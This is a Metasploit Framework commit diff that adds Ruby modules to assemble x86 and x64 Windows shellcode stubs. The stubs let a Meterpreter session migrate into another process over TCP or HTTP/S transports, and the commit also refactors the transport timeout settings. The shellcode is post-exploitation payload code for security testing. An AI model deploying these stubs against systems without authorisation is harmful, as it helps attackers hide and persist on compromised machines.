Move migration stub generation into MSF

This code adds support for transport-specific migration stubs to be
generated in MSF rather than having them hard-coded in Meterpreter.

Author: OJ

lib/msf/core/payload/transport_config.rb

@@ -25,13 +25,10 @@ def transport_config_reverse_ipv6_tcp(opts={})
 
   def transport_config_bind_tcp(opts={})
     {
-      :scheme       => 'tcp',
-      :lhost        => datastore['LHOST'],
-      :lport        => datastore['LPORT'].to_i,
-      :comm_timeout => datastore['SessionCommunicationTimeout'].to_i,
-      :retry_total  => datastore['SessionRetryTotal'].to_i,
-      :retry_wait   => datastore['SessionRetryWait'].to_i
-    }
+      scheme: 'tcp',
+      lhost:  datastore['LHOST'],
+      lport:  datastore['LPORT'].to_i
+    }.merge(timeout_config)
   end
 
   def transport_config_reverse_https(opts={})
@@ -54,19 +51,26 @@ def transport_config_reverse_http(opts={})
     end
 
     {
-      :scheme       => 'http',
-      :lhost        => opts[:lhost] || datastore['LHOST'],
-      :lport        => (opts[:lport] || datastore['LPORT']).to_i,
-      :uri          => uri,
-      :comm_timeout => datastore['SessionCommunicationTimeout'].to_i,
-      :retry_total  => datastore['SessionRetryTotal'].to_i,
-      :retry_wait   => datastore['SessionRetryWait'].to_i,
-      :ua           => datastore['MeterpreterUserAgent'],
-      :proxy_host   => datastore['PayloadProxyHost'],
-      :proxy_port   => datastore['PayloadProxyPort'],
-      :proxy_type   => datastore['PayloadProxyType'],
-      :proxy_user   => datastore['PayloadProxyUser'],
-      :proxy_pass   => datastore['PayloadProxyPass']
+      scheme:      'http',
+      lhost:       opts[:lhost] || datastore['LHOST'],
+      lport:       (opts[:lport] || datastore['LPORT']).to_i,
+      uri:         uri,
+      ua:          datastore['MeterpreterUserAgent'],
+      proxy_host:  datastore['PayloadProxyHost'],
+      proxy_port:  datastore['PayloadProxyPort'],
+      proxy_type:  datastore['PayloadProxyType'],
+      proxy_user:  datastore['PayloadProxyUser'],
+      proxy_pass:  datastore['PayloadProxyPass']
+    }.merge(timeout_config)
+  end
+
+private
+
+  def timeout_config
+    {
+      comm_timeout: datastore['SessionCommunicationTimeout'].to_i,
+      retry_total:  datastore['SessionRetryTotal'].to_i,
+      retry_wait:   datastore['SessionRetryWait'].to_i
     }
   end
 

lib/msf/core/payload/windows/migrate.rb

@@ -0,0 +1,5 @@
+# -*- coding: binary -*-
+
+require 'msf/core/payload/windows/block_api'
+require 'msf/core/payload/windows/migrate_tcp'
+require 'msf/core/payload/windows/migrate_http'

lib/msf/core/payload/windows/migrate_common.rb

@@ -0,0 +1,49 @@
+# -*- coding: binary -*-
+
+require 'msf/core'
+require 'msf/core/payload/windows/block_api'
+
+module Msf
+
+###
+#
+# Not really a payload, but more a mixin that lets common functionality
+# live in spot that makes sense, so that code duplication is reduced.
+#
+###
+
+module Payload::Windows::MigrateCommon
+
+  include Msf::Payload::Windows
+  include Msf::Payload::Windows::BlockApi
+
+  #
+  # Constructs the migrate stub on the fly
+  #
+  def generate(opts={})
+    asm = %Q^
+    migrate:
+      cld
+      pop esi
+      pop esi             ; esi now contains the pointer to the migrate context
+      sub esp, 0x2000
+      call start
+      #{asm_block_api}
+    start:
+      pop ebp
+    #{generate_migrate(opts)}
+    signal_event:
+      push dword [esi]    ; Event handle is pointed at by esi
+      push #{Rex::Text.block_api_hash('kernel32.dll', 'SetEvent')}
+      call ebp            ; SetEvent(handle)
+    call_payload:
+      call dword [esi+8]  ; Invoke the associated payload
+    ^
+
+    Metasm::Shellcode.assemble(Metasm::X86.new, asm).encode_string
+  end
+
+end
+
+end
+

lib/msf/core/payload/windows/migrate_http.rb

@@ -0,0 +1,40 @@
+# -*- coding: binary -*-
+
+require 'msf/core'
+require 'msf/core/payload/windows/migrate_common'
+
+module Msf
+
+###
+#
+# Payload that supports migration over HTTP/S transports on x86.
+#
+###
+
+module Payload::Windows::MigrateHttp
+
+  include Msf::Payload::Windows::MigrateCommon
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'        => 'HTTP/S Transport Migration (x86)',
+      'Description' => 'Migration stub to use over HTTP/S transports via x86',
+      'Author'      => ['OJ Reeves'],
+      'License'     => MSF_LICENSE,
+      'Platform'    => 'win',
+      'Arch'        => ARCH_X86
+    ))
+  end
+
+  #
+  # Constructs the migrate stub on the fly
+  #
+  def generate_migrate(opts={})
+    # This payload only requires the common features, so return
+    # an empty string indicating no code requires.
+    ''
+  end
+
+end
+
+end

lib/msf/core/payload/windows/migrate_tcp.rb

@@ -0,0 +1,68 @@
+# -*- coding: binary -*-
+
+require 'msf/core'
+require 'msf/core/payload/windows/migrate_common'
+
+module Msf
+
+###
+#
+# Payload that supports migration over the TCP transport on x86.
+#
+###
+
+module Payload::Windows::MigrateTcp
+
+  include Msf::Payload::Windows::MigrateCommon
+
+  WSA_VERSION = 0x190
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'        => 'TCP Transport Migration (x86)',
+      'Description' => 'Migration stub to use over the TCP transport via x86',
+      'Author'      => ['OJ Reeves'],
+      'License'     => MSF_LICENSE,
+      'Platform'    => 'win',
+      'Arch'        => ARCH_X86
+    ))
+  end
+
+  #
+  # Constructs the migrate stub on the fly
+  #
+  def generate_migrate(opts={})
+    %Q^
+    load_ws2_32:
+      push '32'
+      push 'ws2_'
+      push esp                  ; pointer to 'ws2_32'
+      push #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')}
+      call ebp                  ; LoadLibraryA('ws2_32')
+    init_networking:
+      mov eax, #{WSA_VERSION}   ; EAX == version, and is also used for size
+      sub esp, eax              ; allocate space for the WSAData structure
+      push esp                  ; Pointer to the WSAData structure
+      push eax                  ; Version required
+      push #{Rex::Text.block_api_hash('ws2_32.dll', 'WSAStartup')}
+      call ebp                  ; WSAStartup(Version, &WSAData)
+    create_socket:
+      push eax                  ; eax is 0 on success, use it for flags
+      push eax                  ; reserved
+      lea ebx, [esi+0x10]       ; get offset to the WSAPROTOCOL_INFO struct
+      push ebx                  ; pass the info struct address
+      push eax                  ; no protocol is specified
+      inc eax
+      push eax                  ; SOCK_STREAM
+      inc eax
+      push eax                  ; AF_INET
+      push #{Rex::Text.block_api_hash('ws2_32.dll', 'WSASocketA')}
+      call ebp                  ; WSASocketA(AF_INET, SOCK_STREAM, 0, &info, 0, 0)
+      xchg edi, eax
+    ^
+  end
+
+end
+
+end
+

lib/msf/core/payload/windows/x64/migrate.rb

@@ -0,0 +1,5 @@
+# -*- coding: binary -*-
+
+require 'msf/core/payload/windows/x64/block_api'
+require 'msf/core/payload/windows/x64/migrate_tcp'
+require 'msf/core/payload/windows/x64/migrate_http'

lib/msf/core/payload/windows/x64/migrate_common.rb

@@ -0,0 +1,50 @@
+# -*- coding: binary -*-
+
+require 'msf/core'
+require 'msf/core/payload/windows/x64/block_api'
+
+module Msf
+
+###
+#
+# Not really a payload, but more a mixin that lets common functionality
+# live in spot that makes sense, so that code duplication is reduced.
+#
+###
+
+module Payload::Windows::MigrateCommon_x64
+
+  include Msf::Payload::Windows
+  include Msf::Payload::Windows::BlockApi_x64
+
+  #
+  # Constructs the migrate stub on the fly
+  #
+  def generate(opts={})
+    asm = %Q^
+    migrate:
+      cld
+      mov rsi, rcx
+      sub rsp, 0x2000
+      and rsp, ~0xF
+      call start
+      #{asm_block_api}
+    start:
+      pop rbp
+    #{generate_migrate(opts)}
+    signal_event:
+      mov rcx, qword [rsi] ; Event handle is pointed at by rsi
+      mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'SetEvent')}
+      call rbp            ; SetEvent(handle)
+    call_payload:
+      call qword [rsi+8]  ; Invoke the associated payload
+    ^
+
+    Metasm::Shellcode.assemble(Metasm::X64.new, asm).encode_string
+  end
+
+end
+
+end
+
+

lib/msf/core/payload/windows/x64/migrate_http.rb

@@ -0,0 +1,41 @@
+# -*- coding: binary -*-
+
+require 'msf/core'
+require 'msf/core/payload/windows/x64/block_api'
+
+module Msf
+
+###
+#
+# Payload that supports migration over HTTP/S transports on x64.
+#
+###
+
+module Payload::Windows::MigrateHttp_x64
+
+  include Msf::Payload::Windows::MigrateCommon_x64
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'        => 'HTTP/S Transport Migration (x64)',
+      'Description' => 'Migration stub to use over HTTP/S transports via x64',
+      'Author'      => ['OJ Reeves'],
+      'License'     => MSF_LICENSE,
+      'Platform'    => 'win',
+      'Arch'        => ARCH_X64
+    ))
+  end
+
+  #
+  # Constructs the migrate stub on the fly
+  #
+  def generate_migrate(opts={})
+    # This payload only requires the common features, so return
+    # an empty string indicating no code requires.
+    ''
+  end
+
+end
+
+end
+

lib/msf/core/payload/windows/x64/migrate_tcp.rb

@@ -0,0 +1,71 @@
+# -*- coding: binary -*-
+
+require 'msf/core'
+require 'msf/core/payload/windows/x64/migrate_common'
+
+module Msf
+
+###
+#
+# Payload that supports migration over the TCP transport on x64.
+#
+###
+
+module Payload::Windows::MigrateTcp_x64
+
+  include Msf::Payload::Windows::MigrateCommon_x64
+
+  # Minimum size, plus bytes for alignment
+  WSA_SIZE = 0x1A0
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'        => 'TCP Transport Migration (x64)',
+      'Description' => 'Migration stub to use over the TCP transport via x64',
+      'Author'      => ['OJ Reeves'],
+      'License'     => MSF_LICENSE,
+      'Platform'    => 'win',
+      'Arch'        => ARCH_X64
+    ))
+  end
+
+  #
+  # Constructs the migrate stub on the fly
+  #
+  def generate_migrate(opts={})
+    %Q^
+    load_ws2_32:
+      mov r14, 'ws2_32'
+      push r14
+      mov rcx, rsp              ; pointer to 'ws2_32'
+      sub rsp, #{WSA_SIZE}      ; alloc size, plus alignment (used later)
+      mov r13, rsp              ; save pointer to this struct
+      sub rsp, 0x28             ; space for api function calls (really?)
+      mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')}
+      call rbp                  ; LoadLibraryA('ws2_32')
+    init_networking:
+      mov rdx, r13              ; pointer to the wsadata struct
+      push 2
+      pop rcx                   ; Version = 2
+      mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'WSAStartup')}
+      call rbp                  ; WSAStartup(Version, &WSAData)
+    create_socket:
+      xor r8, r8                ; protocol not specified
+      push r8                   ; flags == 0
+      push r8                   ; reserved == NULL
+      lea r9, [rsi+0x10]        ; Pointer to the info in the migration context
+      push 1
+      pop rdx                   ; SOCK_STREAM
+      push 2
+      pop rcx                   ; AF_INET
+      mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'WSASocketA')}
+      call rbp                  ; WSASocketA(AF_INET, SOCK_STREAM, 0, &info, 0, 0)
+      xchg rdi, rax
+    ^
+  end
+
+end
+
+end
+
+